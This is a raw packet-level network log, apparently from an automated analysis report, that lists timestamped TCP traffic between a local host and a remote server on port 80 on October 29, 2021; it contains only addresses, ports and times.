Oct 29, 2021 20:49:51.411886930 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.411901951 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411928892 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.411995888 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412019968 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412040949 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412062883 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412071943 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412106991 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412122965 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412146091 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412168980 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412189960 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412198067 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412228107 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412230015 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412250042 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412296057 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412300110 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412317038 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412353992 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412355900 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412393093 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412415028 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412431955 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412446022 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412467957 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412487030 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412493944 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412561893 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412580013 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412586927 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412614107 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412637949 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412662029 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412678003 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412691116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412712097 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412733078 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412748098 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412755013 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412775993 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.412786961 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.412816048 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.461548090 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461592913 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461620092 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461656094 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.461695910 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461752892 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.461787939 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461816072 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461842060 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461859941 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.461903095 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461945057 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.461946011 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.461977005 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462018013 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462018967 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462050915 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462078094 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462124109 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462167978 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462224960 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462243080 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462272882 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462289095 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462311983 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462342024 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462383032 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462383986 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462414980 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462451935 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462459087 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462487936 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462515116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462532043 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462579966 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462609053 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462635994 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462654114 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462682009 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462716103 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462716103 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462744951 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462769032 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462771893 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462801933 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462811947 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462830067 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462858915 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462881088 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462914944 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462943077 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.462968111 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.462973118 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463011980 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463038921 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463068962 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463082075 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463087082 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463119984 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463146925 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463159084 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463180065 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463208914 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463224888 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463242054 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463269949 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463280916 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463316917 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463356972 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463361025 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463390112 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463418007 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463429928 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463450909 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463479042 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463500977 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463515043 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463541985 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463562012 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463587046 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463613987 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463632107 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463660955 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463691950 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463710070 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463726044 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463754892 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463771105 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463788033 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463815928 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463834047 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463850975 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463884115 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463895082 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463917017 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463949919 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.463962078 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.463988066 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464015961 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464029074 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464050055 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464083910 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464097023 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464118004 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464152098 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464186907 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464195967 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464226007 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464247942 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464261055 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464289904 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464303970 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464323997 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464351892 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464371920 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464394093 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464416027 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464447021 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464448929 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464483023 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464483023 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464523077 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464550018 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464560986 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464593887 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464623928 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464627028 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464657068 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464678049 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464692116 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464720964 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464750051 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464757919 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464787006 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464801073 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464819908 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464865923 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464885950 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464915037 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464941025 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.464956045 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.464975119 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465003967 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465018034 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465037107 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465068102 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465076923 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465099096 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465131998 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465142965 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465162992 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465193033 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465204954 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465224981 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465251923 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465270042 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465301037 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465333939 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465344906 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465367079 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465394974 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465409040 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465429068 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465456963 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465476036 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465490103 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465517998 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465533018 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465553999 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465585947 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465601921 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465617895 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465643883 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465662003 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465679884 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465708017 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465723038 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.465739965 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465774059 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.465800047 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:51.466023922 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.466469049 CEST	49777	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:51.519150019 CEST	80	49777	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.365895033 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.419445038 CEST	80	49784	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.419750929 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.420375109 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.420414925 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.474013090 CEST	80	49784	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.501753092 CEST	80	49784	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.501889944 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.502151966 CEST	49784	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.535032988 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.555639029 CEST	80	49784	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.587160110 CEST	80	49786	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.589195013 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.589560032 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.589574099 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.641325951 CEST	80	49786	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.666496038 CEST	80	49786	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.666605949 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.666668892 CEST	49786	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.698642015 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.718411922 CEST	80	49786	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.751714945 CEST	80	49787	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.751853943 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.754618883 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.754638910 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.807734966 CEST	80	49787	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.833803892 CEST	80	49787	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.833900928 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.834718943 CEST	49787	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.866767883 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.887672901 CEST	80	49787	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.917987108 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.918119907 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.918287039 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.918303013 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.997317076 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997349977 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997373104 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997397900 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997421980 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997436047 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.997445107 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997469902 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997488976 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.997493029 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997519970 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997520924 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.997543097 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:53.997544050 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:53.997581959 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.048825979 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.048886061 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.048911095 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.048934937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.048959017 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.048969030 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.048985958 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049011946 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049026966 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049037933 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049057007 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049063921 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049083948 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049089909 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049114943 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049122095 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049139023 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049163103 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049186945 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049209118 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049210072 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049236059 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049259901 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049278021 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049284935 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049309969 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049309969 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049333096 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.049355984 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.049381018 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.100760937 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100799084 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100821972 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100857019 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100881100 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.100891113 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100917101 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100927114 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.100941896 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100967884 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.100992918 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.100992918 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101018906 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101027966 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101044893 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101068020 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101068974 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101094007 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101118088 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101138115 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101141930 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101172924 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101212025 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101236105 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.101258993 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.101259947 CEST	80	49789	185.98.87.159	192.168.2.4
